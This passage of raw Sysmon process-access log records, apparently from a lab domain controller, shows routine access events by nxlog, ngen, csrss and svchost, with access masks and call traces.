(x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.637","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7742,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.669\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-0010954B0C00}\r\nTargetProcessId: 1408\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.669","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-0010954B0C00}","TargetProcessId":"1408","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7743,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.669\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-0010954B0C00}\r\nTargetProcessId: 1408\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.669","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-0010954B0C00}","TargetProcessId":"1408","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7744,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.669\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-0010954B0C00}\r\nTargetProcessId: 1408\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.669","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-0010954B0C00}","TargetProcessId":"1408","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7745,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.778\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-001009500C00}\r\nTargetProcessId: 2716\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.778","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-001009500C00}","TargetProcessId":"2716","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7746,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.778\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-001009500C00}\r\nTargetProcessId: 2716\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.778","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-001009500C00}","TargetProcessId":"2716","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7747,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.778\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-001009500C00}\r\nTargetProcessId: 2716\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.778","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-001009500C00}","TargetProcessId":"2716","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7748,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.809\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-001084530C00}\r\nTargetProcessId: 4324\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.809","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-001084530C00}","TargetProcessId":"4324","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\m